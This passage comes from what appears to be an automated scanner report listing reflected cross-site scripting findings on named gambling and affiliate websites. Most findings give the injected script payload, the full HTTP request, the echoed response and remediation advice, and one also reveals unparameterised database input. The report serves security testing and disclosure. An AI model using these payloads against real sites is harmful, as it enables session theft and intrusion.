This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=1301378abcd'%3balert(1)//fdbdc8c0c01&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3s4ea145uzdvo2upuhtuo3rc; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
tedClose = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=1301378abcd';alert(1)//fdbdc8c0c01&PAR=0'+'&Refresh=1' + '&WID=');
   }
       
   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var h
...[SNIP]...

3.34. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into the content attribute of a <meta name="description"> element, which is delimited by double quotes. The payload 190db"style%3d"x%3aexpression(alert(1))"f1e0058e238 was submitted in the BD parameter and echoed as 190db"style="x:expression(alert(1))"f1e0058e238 in the application's response.

This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The double quote closes the content attribute and style= is parsed as a new attribute of the meta element; the CSS expression() in that attribute is then evaluated as JavaScript. Note that expression() is specific to Internet Explorer (and was dropped from IE8 standards mode onwards), so the payload as shown will not run in other browsers, but the underlying attribute breakout is browser-independent.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com190db"style%3d"x%3aexpression(alert(1))"f1e0058e238&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j3jz3quzo4m0ga55rqwealiz; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19506


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<meta content="info.Winnings.com190db"style="x:expression(alert(1))"f1e0058e238, The Best online scratch games in the world, More then 20 amazing online scratch games. Winnings &amp; change your day!!!" name="description" />
...[SNIP]...

3.35. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BD parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BD request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a3b8'%3balert(1)//8816847b473 was submitted in the BD parameter. This input was echoed as 4a3b8';alert(1)//8816847b473 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com4a3b8'%3balert(1)//8816847b473&SDN=Winnings.com&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=liapwh45d4ztmuyumndgtc45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com','','Winnings.com','info.Winnings.com4a3b8';alert(1)//8816847b473','', '','','','','',"")
                        </script>
...[SNIP]...

3.36. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [BO parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the BO request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f0b9'%3balert(1)//c208a0401a was submitted in the BO parameter. This input was echoed as 3f0b9';alert(1)//c208a0401a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PM&BO=FM3f0b9'%3balert(1)//c208a0401a&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cqorslb3q0irn1uxhyakm555; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19503


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PM','FM3f0b9';alert(1)//c208a0401a','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.37. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [PAR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the PAR request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68d70'%3balert(1)//3f67c728a9b was submitted in the PAR parameter. This input was echoed as 68d70';alert(1)//3f67c728a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137&AFI=3&PAR=068d70'%3balert(1)//3f67c728a9b&BD=primescratchcards.com&SDN=primescratchcards.com HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oqzkg255itycuma3lquknh55; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19556


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
se = true; //prevent the "close request" when we change the language
       window.location.replace('Lobby.aspx?CSI=3&SKI=0&AFI=3&MMI=0&CUR=' + pCurrencyCode + '&LNG=~' + pLanguageCode + '&AR=130137&PAR=068d70';alert(1)//3f67c728a9b'+'&Refresh=1' + '&WID=');
   }
       
   //send player events notification
   function TimerGetPlayerEvents()
   {
try
{
    if(UserName!='-')
{
            var httpRes
...[SNIP]...

3.38. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [RegistrationMode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the RegistrationMode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9544'%3balert(1)//639feef7bad was submitted in the RegistrationMode parameter. This input was echoed as c9544';alert(1)//639feef7bad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?CSI=28&LNG=ENG&CUR=GBP&RegistrationMode=PMc9544'%3balert(1)//639feef7bad&BO=FM&BD=info.crazyscratch.com&SDN=CrazyScratch.com& HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jftp2x45snd0xury1lb4a3ir; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19505


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('28','#7dda4d','0','GBP','ENG','0','0','','','','',1,4,5,100,'PMc9544';alert(1)//639feef7bad','FM','CrazyScratch.com','It\'s+money+madness!','CrazyScratch','info.crazyscratch.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.39. https://secure.neogames-tech.com/ScratchCards/lobby.aspx [SDN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /ScratchCards/lobby.aspx

Issue detail

The value of the SDN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69960'%3balert(1)//1a3d4ca2f9a was submitted in the SDN parameter. This input was echoed as 69960';alert(1)//1a3d4ca2f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ScratchCards/lobby.aspx?BD=info.Winnings.com&SDN=Winnings.com69960'%3balert(1)//1a3d4ca2f9a&LNG=~ENG&CUR=GBP&CSI=21 HTTP/1.1
Host: secure.neogames-tech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qknbln55rvubqmvtgokgqr45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 19417


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
       </title>
       <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" />
       <meta name="ProgId"
...[SNIP]...
<script language="javascript">
                            LoadLobby('21','#2f82b6','0','GBP','ENG','0','0','','','','',1,4,5,100,'','','Winnings.com69960';alert(1)//1a3d4ca2f9a','','Winnings.com','info.Winnings.com','', '','','','','',"")
                        </script>
...[SNIP]...

3.40. http://trk.primescratchcards.com/ [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.primescratchcards.com
Path:   /

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 57616<script>alert(1)</script>3888a68dce1 was submitted in the ac parameter and echoed unmodified. The page that echoes it is a 500 error response which also prints the server-side statement being executed, EXEC sp_pixel_insert 5157616<script>alert(1)</script>3888a68dce1 ,130137 ,5143, 201105160000, showing that the ac value is concatenated, unquoted, into a database command as well.

This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Two further remediation points follow from the same response: ac should be validated as an integer and passed to the stored procedure as a typed parameter rather than by string concatenation, and detailed error text should not be returned to the client.

Request

GET /?ac=5157616<script>alert(1)</script>3888a68dce1&AR=130137&SubID=0&PRC=0 HTTP/1.1
Host: trk.primescratchcards.com
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 507
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=MEFGLCIAPBIIFMKKONEKHNHL; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 5157616<script>alert(1)</script>3888a68dce1 ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Micro
...[SNIP]...

3.41. https://www.aspireaffiliates.com/ [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the href attribute of an anchor, which is delimited by double quotes. The payload ecc07"><script>alert(1)</script>964271dc4b6 was submitted in the CMI parameter and echoed as ecc07\"><script>alert(1)</script>964271dc4b6 in the application's response: the only change is a backslash before the double quote, the transform applied by PHP's addslashes() or magic_quotes_gpc (the response advertises PHP/5.1.6).

This proof-of-concept demonstrates that it is possible to inject arbitrary JavaScript into the application's response. A backslash is not an escape character in HTML, so the quote still terminates the attribute value and > closes the tag; the value needs HTML attribute encoding (&quot; &lt; &gt; &amp;) at the point of output, not SQL-style slashing at the point of input.

Request

GET /?CMI=1ecc07"><script>alert(1)</script>964271dc4b6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=1ecc07\"><script>alert(1)</script>964271dc4b6" title="Home">
...[SNIP]...

3.42. https://www.aspireaffiliates.com/ [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a96c</script><script>alert(1)</script>e23233807d6 was submitted in the CMI parameter. This input was echoed unmodified in the application's response. The payload contains no quote character, so the backslash-escaping seen in 3.41 does not touch it, and it does not need to terminate the JavaScript string: the HTML tokenizer ends the script element at the first </script> sequence regardless of where the JavaScript parser is, and the <script> block that follows is then executed as ordinary markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot be avoided, the data must be encoded for a JavaScript string literal (at minimum the backslash, both quote characters, line terminators and the < and > characters, so that a </script> sequence can never be formed) and must be placed only inside a quoted string literal. Backslash-escaping quotes alone, as this host does, is not sufficient, because the payload above needs no quote to break out.

Request

GET /?CMI=15a96c</script><script>alert(1)</script>e23233807d6 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
k(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=15a96c</script><script>alert(1)</script>e23233807d6';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=15a96c</script>
...[SNIP]...

3.43. https://www.aspireaffiliates.com/ [CMI parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ef6"><script>alert(1)</script>b2d5fefb499 was submitted in the CMI parameter. This input was echoed as 15ef6\"><script>alert(1)</script>b2d5fefb499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?CMI=15ef6"><script>alert(1)</script>b2d5fefb499 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?CMI=15ef6\"><script>alert(1)</script>b2d5fefb499" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.44. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17763"><script>alert(1)</script>f04f9a95002 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as 17763\"><script>alert(1)</script>f04f9a95002 in the application's response. The parameter name itself is a leftover from the arbitrary-parameter-name probe in 3.48 (the same d0cc2...b04df9313ef marker, with alert(document.cookie) substituted for alert(1)) that was carried through the rest of the crawl as the site's base URL, as the Referer headers from 3.51 onwards show. Read together with 3.41 to 3.43 and 3.47 to 3.49, this indicates that the page reflects its entire raw query string, parameter names and values alike, into the same two sinks (the href of the Home link and the JavaScript redirect URL) on every path tested, so these findings are repeated instances of one root cause rather than independent bugs.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763"><script>alert(1)</script>f04f9a95002 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=117763\"><script>alert(1)</script>f04f9a95002" title="Home">
...[SNIP]...

3.45. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eda92</script><script>alert(1)</script>f5f515c1148 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
ular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script><script>alert(1)</script>f5f515c1148';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=1eda92</script>
...[SNIP]...

3.46. https://www.aspireaffiliates.com/ [d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The value of the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4800"><script>alert(1)</script>7b893187770 was submitted in the d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef parameter. This input was echoed as d4800\"><script>alert(1)</script>7b893187770 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800"><script>alert(1)</script>7b893187770 HTTP/1.1
Host: www.aspireaffiliates.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Date: Mon, 16 May 2011 12:46:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx?d0cc2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb04df9313ef=d4800\"><script>alert(1)</script>7b893187770" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.47. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb220</script><script>alert(1)</script>85bdb6913a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?fb220</script><script>alert(1)</script>85bdb6913a5=1 HTTP/1.1
Host: www.aspireaffiliates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:59:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.aspireaffiliates.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
.click(function(){
       $("#brands_ok_more").show("slow");
   $("#brands_popular").css("padding-top","630px");
       
       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?fb220</script><script>alert(1)</script>85bdb6913a5=1';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?fb220</script>
...[SNIP]...

3.48. https://www.aspireaffiliates.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

